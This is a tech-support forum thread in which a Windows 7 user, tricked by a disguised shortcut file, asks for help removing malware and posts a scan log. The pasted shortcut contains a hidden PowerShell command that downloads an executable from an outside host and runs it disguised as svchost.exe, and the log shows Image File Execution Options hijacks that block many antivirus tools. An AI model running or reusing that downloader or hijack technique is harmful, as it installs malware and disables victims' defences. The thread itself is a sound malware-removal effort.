Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Windows 7 System Virus


  • This topic is locked This topic is locked
27 replies to this topic

#1 jumpman17

jumpman17

  • Members
  • 25 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:03 PM

Posted 14 October 2016 - 10:13 AM

I'm running Windows 7. I feel like a complete idiot and got tricked into opening a txt file that was actually a lnk file which then quickly ran a program, locked up my pc, and upon reboot, had 2 new accounts created. They were GuestAcc and TEST. I tried to open my normal account but it just loads to a black screen with the mouse icon. Ctrl+Alt+Del and picking Task Manager makes a Command Prompt window open and close instantly. I have the harddrive hooked up as an external drive right now on my other computer and I'm doing a full scan with Malwarebytes to see if that finds anything, but I don't think it's going to help with the kind of problem this is.

 

Here is the little bugger that ran and caused this. Hopefully this will give someone an idea of what it did and hopefully with your help I can fix this. Thanks.

 

EDIT: After spending all day on this, I think I may have mostly solved this. Malwarebytes did not find anything after completing it's scan. I hooked my drive back up to my PC and found that while Safe Boot would only boot to a black screen, Safe Boot with Command Prompt would load the Command Prompt. From there I was able to run programs (except for things like regedit or taskmgr which still wouldn't). So I continued my hunt and found that a new file was created today located at C:\Users\Me\AppData\Roaming\Oracle\JavaUpdate.exe. I could not delete it because it was in use it said. I found a startup task of "Rundll32.exe shell32.dll, ShellExec_RunDLL C:\User\Me\AppData\Roaming\Oracle\JavaUpdate.exe" and when I would end the task, it would instantly restart. So I hooked the drive up again to my other computer and deleted the JavaUpdate.exe file, then hooked it back up to my PC. This finally let me boot to my desktop. From there I deleted the startup key, deleted the other 2 user accounts it created.

 

But...my fear was still something I saw while working in Command Prompt. Every once in awhile, upon loading Command Prompt, it would show "Connecting to: 158.69.175.140:5678". I had unplugged my ethernet cable the second my computer had locked up originally so it would never actually connect. Before plugging my internet back in though, I blocked all incoming and outgoing traffic to that IP address in Windows Firewall just to be safe.

 

So basically, here's where I'm at. Did I get all the pieces to this virus? Also, regedit and taskmgr still don't work. I haven't worked on those yet because frankly, I'm exhausted and my head hurts.

L           À      Fë       «£–4  Ê «£–4  Ê ð'êl  Ê  è                     ñ   ¬PàOÐ ê:i ¢Ø  +00  /C:\                   R 1     >I1-  Windows <     ï¾î:£ >I1-*   <                     W i n d o w s     V 1     =IÍ   System32  >     ï¾î:¤ =IÍ *   À	                    S y s t e m 3 2     h 1     î:&  WINDOW~1  P     ï¾î:&î:&*   ô                     W i n d o w s P o w e r S h e l l     J 1     Œ>    v1.0  6     ï¾î:&Œ>  *   õ                     v 1 . 0     h 2  è  î:Í	  powershell.exe  J     ï¾í: ¼í: ¼*   
o                    p o w e r s h e l l . e x e       h               -       g           »#%F     C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  E . . \ . . \ . . \ . . \ . . \ W i n d o w s \ S y s t e m 3 2 \ W i n d o w s P o w e r S h e l l \ v 1 . 0 \ p o w e r s h e l l . e x e ¾ - E x e c u t i o n P o l i c y   b y p a s s   - n o p r o f i l e   - w i n d o w s t y l e   h i d d e n   ( N e w - O b j e c t   S y s t e m . N e t . W e b C l i e n t ) . D o w n l o a d F i l e ( ' h t t p : / / c d n . c h e . m o e / b f o m v f . e x e ' , ' % T E M P % \ s v c h o s t . e x e ' ) ; S t a r t - P r o c e s s   ' % T E M P % \ s v c h o s t . e x e ' " % S y s t e m R o o t % \ s y s t e m 3 2 \ i m a g e r e s . d l l         %   Õ       
   wNÁ ç ]N·D.±®Q˜·Õ   •   	   ‰   1SPSâŠXF¼L8C»ü “&˜mÎm        ¬   .   S - 1 - 5 - 2 1 - 7 1 6 9 2 8 4 8 7 - 3 7 3 4 2 7 2 2 7 9 - 3 8 7 6 0 6 2 1 2 1 - 1 0 0 1           `       X       bless-pc        P©or®´@Nº«gbwp¾,îáêâ~†æ ­O ÈÊŸP©or®´@Nº«gbwp¾,îáêâ~†æ ­O )ÈÊŸ    


Edited by jumpman17, 14 October 2016 - 09:43 PM.


BC AdBot (Login to Remove)

 


#2 TsVk!

TsVk!

    penguin farmer


  • Members
  • 6,234 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Antipodes
  • Local time:03:03 AM

Posted 18 October 2016 - 11:05 PM

Hi jumpman17

 

My name is TsVk!, but you can call me John. I'll be helping you with your issue. :)

 

Just a few ground rules before we get started.

  • Please don't run any malware removal programs unless directed.
  • Please don't make any system changes unless directed.
  • Please backup all essential data now. We are are removing software designed to damage/compromise your system, it's inherently risky business.
  • Please copy and paste all logs in plain text straight into your reply, do not quote or attach logs.

These things are to make it easier for me to help you.

 

i5r8d1.jpg  Download Farbar Recovery Scan Tool.

  1. Choose 32bit or 64bit depending on your Windows version. If you are unsure click here.
  2. Save the application to your desktop and run it.
  3. Click Yes to allow the application
  4. Click Scan, wait for the log to appear
  5. Copy and paste the results into your next reply.

 

Please be aware that I am still in training and everything that I say needs to be covered in detail with my instructor. This is a bonus for you because you have two sets of eyes on your thread, but you need to be aware this can take some time so my responses may take a day or so.

 

TsVk!



#3 jumpman17

jumpman17
  • Topic Starter

  • Members
  • 25 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:03 PM

Posted 18 October 2016 - 11:36 PM

Thanks for the reply, TsVk. Here are the requested logs.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 17-10-2016
Ran by Kevin (administrator) on KEVIN-PC (19-10-2016 00:12:02)
Running from C:\Users\Kevin\Desktop
Loaded Profiles: Kevin (Available Profiles: Kevin)
Platform: Windows 7 Ultimate Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Hewlett-Packard Company) C:\Program Files (x86)\HP\Common\HPSupportSolutionsFrameworkService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRService.exe
(Splashtop Inc.) C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe
(Rocket Division Software) C:\Program Files (x86)\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(BitTorrent Inc.) C:\Users\Kevin\AppData\Roaming\uTorrent\uTorrent.exe
(BitTorrent Inc.) C:\Users\Kevin\AppData\Roaming\uTorrent\updates\3.4.9_42606\utorrentie.exe
(BitTorrent Inc.) C:\Users\Kevin\AppData\Roaming\uTorrent\updates\3.4.9_42606\utorrentie.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(AOL Inc.) C:\Program Files (x86)\AIM\aim.exe


==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8447192 2015-02-05] (Realtek Semiconductor)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176440 2016-09-09] (Apple Inc.)
HKLM-x32\...\Run: [amd_dc_opt] => C:\Program Files (x86)\AMD\Dual-Core Optimizer\amd_dc_opt.exe [77824 2008-07-22] (AMD)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [67384 2016-09-01] (Apple Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [2621440 2010-06-10] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [296216 2015-01-27] (Intel Corporation)
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.)
HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\...\Run: [uTorrent] => C:\Users\Kevin\AppData\Roaming\uTorrent\uTorrent.exe [1977536 2016-10-07] (BitTorrent Inc.)
HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Ribbons.scr [241664 2010-11-20] (Microsoft Corporation)
HKU\S-1-5-18\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [1403304 2016-01-28] (Garmin Ltd. or its subsidiaries)
IFEO: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\3.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\acs.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AdAwareDesktop.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AdAwareService.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AdAwareTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\adoronsfirewall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AgentSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\alertwall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ALMon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ALsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\alupdate.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AntiHook.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\app_firewall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\apvxdwin.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\armorwall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\as3pf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\asr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\aupdrun.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\authfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avas.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AvastSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AvastUi.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avcom.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVK.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKProxy.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKService.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avkwctl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\AVKWCtlx64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avkwctrl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avmgma.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avpmapp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\avtask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\aws.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\backgroundscanclient.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Bav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bavhm.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavUpdater.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BavWebClient.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BDSSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bgctl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bgnt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BgScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\blackd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\blackice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\blinksvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\bootsafe.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BullGuard.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BullGuardUpdate.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\BullGuarScanner.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\capinfos.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavApp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cavasm.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavAUD.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavCons.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavEmSrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Cavmr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavMud.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Cavoar.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavQ.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavSn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavSub.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavUMAS.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CavUserUpd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Cavvl.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cavwp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cdas17.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cdas2.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cdinstx.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CEmRep.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cis.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CisTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\clamd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\clamscan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ClamTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ClamWin.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CMain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cmdagent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cmgrdian.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\configmgr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\configuresav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CONSCTLX.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\coreFrameworkHost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\coreServiceShell.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\cpd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\csi-eui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\CV.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\DCSUserProt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dlservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dltray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dragon_updater.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dumpcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dvpapi.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\dwengine.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\econceal.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\econser.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\editcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ekern.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ekrn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\emlproui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\EMLPROXY.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\endtaskpro.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\escanmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\escanpro.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\espwatch.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Ethereal.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fameh32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fgui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\filedeleter.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\filemon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\firewall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\firewall2004.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\firewallgui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FPAVServer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FProtTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FPWin.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\freshclam.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\freshclamwrap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fsgk32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FSHDLL64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fshoster32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FSM32.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\FSMA32.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fsorsp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fsrt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fssm32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\fwsrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\gateway.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GDKBFltExe32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GDSC.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GDScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\GpChromeDatabasegInx64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\guardxkickoff_x64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\guardxservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\hpf_.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\iface.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\InstLsp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\invent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ipatrol.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ipcserver.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ipctray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\iptray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7AVScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7CrvSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7EmlPxy.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7FWSrvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7PSSrvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7RTScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7SysMon.Exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7TSecurity.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7TSMain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\K7TSMngr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\kav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\kpf4gui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\kpf4ss.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\licwiz.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Lite.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\LittleHook.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\livehelp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\lookout.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\lpfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mbam.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mbamscheduler.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mbamservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mcods.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCS-Uninstall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCShieldCCC.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCShieldDS.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MCShieldRTM.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
